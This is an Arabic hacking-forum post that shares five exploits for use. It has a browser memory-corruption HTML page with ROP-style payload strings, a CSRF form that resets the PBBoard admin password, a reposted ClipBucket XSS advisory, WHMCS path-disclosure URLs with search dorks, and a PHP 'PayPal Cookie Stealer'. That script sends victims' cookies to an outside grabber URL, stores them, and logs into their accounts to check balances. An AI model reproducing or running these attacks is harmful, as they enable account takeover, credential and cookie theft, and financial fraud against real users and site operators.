السلام عليكم انشاء الله تكونو بخير
نبدا ب الثغرة الاولى وهي خاصة بالمتصفحات الفايرفوكس و الانترنيت اكسبولر
# Title : Mozilla Firefox 18.0.2/ Opera 12.12 / Iexplorer 9 Memory Corruption
# Date: 2013-02-18
# Softwares Link:
http://www.mozilla.org
http://www.opera.com/
http://windows.microsoft.com/fr-CA/internet-explorer/
# phone : +447024073406
# Author: The Black Devils
# Tested on: Windows XP SP2 & Puppy Linux & BackTrack 5
# Home: www.arab47.com منتديات عرب غرداية
# Greeting To :All Arab47 memberz/ 3xp1r3 Cyber Army / Newbie3viLc063s

<html>
<head>
<title>Firefox 18.0.2 M3M0RY C0RRUPT!0N </title>
<body onload="javascript:hakim();">
<script language="JavaScript">
function hakim()
{
var rop =unescape("%ubcf1%u1000");
rop+=unescape("%uf5ef%u1000");
rop+=unescape("%u0000%u0000");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%uea03%u1001");
rop+=unescape("%u6f51%u1000");
rop+=unescape("%ubfc1%u1000");
rop+=unescape("%u0060%u1002");
rop+=unescape("%u0c50%u0c0c");
rop+=unescape("%uee6a%u1000");
rop+=unescape("%udda4%u1000");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u1ab4%u1000");
rop+=unescape("%u58c3%u1000");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%uf986%u1000");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u0070%u0041");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u0078%u0075");
rop+=unescape("%u006c%u002e");
rop+=unescape("%u0064%u006c");
rop+=unescape("%u006c%u0000");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%u3374%u00a6");
rop+=unescape("%u8acf%u1001");
rop+=unescape("%u8dd1%u1000");
rop+=unescape("%ue0b8%u1000");
rop+=unescape("%u3f14%u1001");
rop+=unescape("%ue0b8%u1000");
rop+=unescape("%u62d5%u1001");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%u9d12%u1001");
rop+=unescape("%uf5ef%u1000");
rop+=unescape("%u0001%u0000");
rop+=unescape("%u1000%u0000");
rop+=unescape("%u7e46%u1000");
rop+=unescape("%u0040%u0000");
rop+=unescape("%uaa6a%u1000");
rop+=unescape("%uaa03%u1001");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u58c3%u1000");
document.write(rop);
var buffer = '\x41\x45\xF2'
for(i=0; i <= 999 ; ++i)
{
buffer+=buffer+buffer
document.write(buffer);

}
}
</script>
</head>
</body>
</html>


// Proof of concept
http://5.53.78ae.static.theplanet.co...ns%20titre.GIF

if you click on that link your browser will crash

[url]http://5.53.78ae.static.theplanet.com/~amodio/dz.html[/url]

الثغرة الثانية
PBBoard Version 3.0.0 CSRF Vulnerability
Open a new html file and put the code below with changing


PBBoard Version 3.0.0 CSRF Vulnerability



Dork:Powered by PBBoard © Version 3.0.0


the url and click Send

HTML Code:

<form action="http://localhost/pbboard/index.php?page=new_password&forget=1" method="post" name="main" id="main">
<input type="hidden" name="member_id" value="1">
<input type="hidden" name="new_password" value="pass">
<input type="submit" name="Submit" value="Send">
</form>

member_id For the user id (default value is 1 for admin)
new_password the new password to change for(default password is pass)

الثغرة الثالثة
Information

--------------------

Name : XSS Vulnerabilities in ClipBucket

Software : ClipBucket 2.6 and possibly below.

Vendor Homepage : http://clip-bucket.com

Vulnerability Type : Cross-Site Scripting

Severity : Critical

Researcher : Canberk Bolat

Advisory Reference : NS-12-013



Description

--------------------

ClipBucket is an OpenSource Multimedia Management Script Provided Free

to the Community. This script comes with all the bells & whistles

required to start your own Video Sharing website like Youtube,

Metacafe, Veoh, Hulu or any other top video distribution application

in matter of minutes. ClipBucket is fastest growing script which was

first started as Youtube Clone but now its advance features &

enhancements makes it the most versatile, reliable & scalable media

distribution platform with latest social networking features, while

staying light on your pockets. Whether you are a small fan club or a

big Multi Tier Network operator, Clipbucket will fulfill your video

management needs.



Details

--------------------

ClipBucket is affected by XSS vulnerabilities in version 2.6



Params: (cat, sort, time, seo_cat_name, cat, sort, time, page, seo_cat_name)

Files: (channels.php, collections.php, groups.php, photos.php, videos.php)

http://example.com/search_result.php...&submit=Search



signup.php (POST: username)

You can read the full article about Cross-Site Scripting from here:



Cross-site Scripting (XSS)

Solution

--------------------

No fix.



Advisory Timeline

--------------------

05/12/2011 - First Contact

03/01/2012 - Second Contact - No Reply

19/10/2012 - Advisory Released



Credits

--------------------

It has been discovered on testing of Netsparker, Web Application

Security Scanner - http://www.mavitunasecurity.com/netsparker/.



References

--------------------

Vendor Url / Patch : -

MSL Advisory Link :

http://www.mavitunasecurity.com/xss-...in-clipbucket/

Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/



About Netsparker

--------------------

Netsparker® can find and report security issues such as SQL Injection

and Cross-site Scripting (XSS) in all web applications regardless of

the platform and the technology they are built on. Netsparker's unique

detection and exploitation techniques allows it to be dead accurate in

reporting hence it's the first and the only False Positive Free web

الثغرة الرابعة وهي الاحلى بينهم

WHMCS <= 5.1.3 Full Path Disclosure Vulnerability
[#] Dork : intext:netearthone.php


[#] exploit :

http://website/includes/smarty/Smart...iler.class.php
http://website/modules/registrars/ne...etearthone.php

الثغرة الخامسة
PayPal Cookie Stealer exploit XSS-Free
<?php
/*
Website: You are not allowed to view links. Register or Login to view.
PayPal Cookie Stealer exploit XSS-Free (CarderX.com)
Coded by: mainl00p
Type: Private <No leech. **** you! **** m1nu3t and all his band _|_!>
(O)
<M
o <M PayPal Blow Up! Cross Site Scripting (The SWORD TEAM)
/| ...... /:M\------------------------------------------------,,,,,,
(O)[]XXXXXX[]I:K+}=====<{H}>================================------------>
\| ^^^^^^ \:W/------------------------------------------------''''''
o <W mainl00p
<W You are not allowed to view links. Register or Login to view.
(O)
*/

define("PPLOGIN_URL", "https://www.paypal.com/en");
define("PPXSS_URL", "https://www.paypal.com/it/cgi-bin/webscr?cmd=_shop-search-ext&search_cat_name=%22/%3E%27&q=%22&search_cat=&region=%22%3E%3Ciframe%20 onload=alert(0)/%3E");
define("COOKIE_FILE", "carderX.txt"); // A COOKIE FILE (WHERE TO STORE THE COOKIES)
define("EXPLOIT_URL", "http://carderx.com/temp/exploit.php"); // HERE YOU NEED TO PUT YOUR GRABBER'S URL

// I put automatically those fields (_t must be there, it can have random value, I preferred NULL)
function doXSS($Vector) {
echo "<form id=\"sui_m\" name=\"sui_m\" method=\"post\" class=\"\" action=\"" . PPXSS_URL . "\">
<input type=\"hidden\" name=\"_t\" value=\"\"/>
<input type=\"hidden\" name=\"_fl\" value=\"1\" />
<input type=\"hidden\" name=\"atoi\" value=\"0\" />
<input type=\"hidden\" name=\"min\" value=\"0\" />
<input type=\"hidden\" name=\"max[0]\" value=\"\" />
<input type=\"hidden\" name=\"load\" value=\"$Vector\" />
</form>
<script type=\"text/javascript\">document.getElementById(\"sui_m\").su bmit();</script>";
}

// Gets the cookie from GET parameter returned by XSS and stores it in file
function getCookie() {
if (isset($_GET["c"])) {
$f = fopen(COOKIE_FILE, "a");
$c = base64_encode($_GET["c"]);
fwrite($f, $c . "\n");
fclose($f);
}
}

// Reads the cookie from file
function readCookies() {
$c = file_get_contents(COOKIE_FILE);
return explode("\n", $c);
}

// Logs in and checks the ballance
function check($Cookie) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, PPLOGIN_URL);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $Cookie);
$s = curl_exec($ch);
if (preg_match("/Ballance: (.*)\<\/b\>/i", $s, $z))
return $z[1];
return NULL;
}


// MAIN
if (isset($_GET["admin"]) && $_GET["admin"] == "true") {
$ck = readCookies();
echo "<table style=\"font-size: 12px;\">\n";
echo "<tr style=\"background-color: red; color: white;\"><td style=\"width: 50px;\"><b>Id</b></td><td style=\"width: 700px;\"><b>Cookie</b></td><td><b>Check</b></td></tr>\n";
$i = 0;
foreach ($ck as $c) {
echo "<tr style=\"background-color: grey;\"><td>" . ++$i . "</td><td>$c</td><td><a href=\"?check=" . base64_encode($c) . "\">Check</a></td></tr>\n";
}
die("");
}

if (isset($_GET["check"]) && $_GET["check"] != "") {
$cz = check(check($_GET["check"]));
if ($cz != NULL)
echo "Ballance: " . $cz;
else
echo "Error logging in!";
die("");
}

$XSS = "\">**********window.location=" . EXPLOIT_URL . "?c=" . "\" + document.cookie;</script>";
doXSS($XSS);
?>

ارجو ان تنال اعجابكم وارجو التفاعل في منتدى . واهداء الى كل اعضاء ومشرفينا